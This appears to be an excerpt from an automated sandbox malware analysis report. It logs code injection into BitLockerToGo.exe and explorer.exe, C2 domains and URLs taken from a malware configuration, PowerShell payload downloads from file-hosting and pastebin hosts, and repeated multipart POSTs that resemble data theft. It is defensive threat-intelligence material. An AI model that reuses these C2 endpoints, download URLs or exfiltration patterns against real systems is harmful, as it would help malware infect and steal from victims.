Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+08h]	13_2_00751937
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	13_2_0075B920
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	13_2_0075B920
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+50h]	13_2_007691C8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [00784970h]	13_2_007641A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [edi+0Ch]	13_2_00743260
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [edx], 0000h	13_2_00753A2A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then lea ebp, dword ptr [esp+03h]	13_2_00766210
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp+54h]	13_2_007572DD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	13_2_007572DD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [eax+ebx+02h], 0000h	13_2_007582CB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	13_2_00743A80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	13_2_0075B360
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	13_2_0077B350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edi, eax	13_2_0077B350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	13_2_0077B350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [eax+edi*8], 11081610h	13_2_00764BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [00784A9Ch]	13_2_00764BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	13_2_00771BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, dword ptr [esi+08h]	13_2_007543E5
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 11081610h	13_2_007633B6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	13_2_0074E450
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	13_2_0075EC06
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [ecx], 00000000h	13_2_00751D52
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	13_2_007665F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+10h]	13_2_00753DE6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	13_2_00742DD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	13_2_0077B5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edi, eax	13_2_0077B5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	13_2_0077B5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edi, eax	13_2_00753678
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	13_2_00754E68
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [ebx], 00000000h	13_2_00754E68
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	13_2_00754E68
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]	13_2_00756EF8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then inc ebx	13_2_007566B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, word ptr [esi+eax]	13_2_00776710
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov al, 01h	13_2_0077A706
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	13_2_0077B700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edi, eax	13_2_0077B700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	13_2_0077B700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 11081610h	13_2_007637B6

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 77.221.157.163 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 107.173.160.139 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 107.173.160.137 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.0.235.84 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 109.172.114.212 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 64.190.113.113 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 78.89.199.216 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 167.235.128.153 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.149.100.242 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 190.12.87.61 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: indexterityszcoxp.shop
Source: Malware configuration extractor	URLs: lariatedzugspd.shop
Source: Malware configuration extractor	URLs: callosallsaospz.shop
Source: Malware configuration extractor	URLs: outpointsozp.shop
Source: Malware configuration extractor	URLs: liernessfornicsa.shop
Source: Malware configuration extractor	URLs: upknittsoappz.shop
Source: Malware configuration extractor	URLs: shepherdlyopzc.shop
Source: Malware configuration extractor	URLs: unseaffarignsk.shop
Source: Malware configuration extractor	URLs: http://mzxn.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://100xmargin.com/tmp/index.php
Source: Malware configuration extractor	URLs: http://wgdnb4rc.xyz/tmp/index.php
Source: Malware configuration extractor	URLs: http://olinsw.ws/tmp/index.php

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: rentry.co

Source: unknown

Network traffic detected: IP country count 10

Source: global traffic	TCP traffic: 192.168.2.4:50739 -> 94.156.79.190:4449
Source: global traffic	TCP traffic: 192.168.2.4:50787 -> 193.222.96.24:4449

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 06:54:02 GMTServer: ApacheLast-Modified: Mon, 22 Jul 2024 19:29:34 GMTETag: "f1600-61ddb109e6b16"Accept-Ranges: bytesContent-Length: 988672Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 05 00 6c 5a 41 03 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 00 00 00 c0 08 00 00 5c 06 00 00 00 00 00 c0 5a 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 0f 00 00 04 00 00 00 00 00 00 03 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 78 10 0f 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0f 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 c0 08 00 00 10 00 00 00 c0 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 00 50 06 00 00 d0 08 00 00 4c 06 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 30 00 00 00 20 0f 00 00 02 00 00 00 10 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 00 10 00 00 00 50 0f 00 00 02 00 00 00 12 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 58 00 00 00 00 60 0f 00 00 02 00 00 00 14 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: Joe Sandbox View	IP Address: 77.221.157.163 77.221.157.163
Source: Joe Sandbox View	IP Address: 107.173.160.139 107.173.160.139
Source: Joe Sandbox View	IP Address: 107.173.160.137 107.173.160.137

Source: Joe Sandbox View	ASN Name: INFOBOX-ASInfoboxruAutonomousSystemRU INFOBOX-ASInfoboxruAutonomousSystemRU
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: a6c95ef2da5b759f65c60665167952ee
Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: GET /wp-content/images/pic1.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 8179
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 155659
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1288
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: GET /setups.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: funrecipebooks.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: callosallsaospz.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: GET /microgods/raw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-CH) WindowsPowerShell/5.1.19041.1682Host: rentry.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: callosallsaospz.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: callosallsaospz.shop
Source: global traffic	HTTP traffic detected: GET /download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: callosallsaospz.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: callosallsaospz.shop
Source: global traffic	HTTP traffic detected: GET /download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.io
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1256Host: callosallsaospz.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569637Host: callosallsaospz.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: liernessfornicsa.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: liernessfornicsa.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: liernessfornicsa.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: liernessfornicsa.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: liernessfornicsa.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1245Host: liernessfornicsa.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 552479Host: liernessfornicsa.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: liernessfornicsa.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
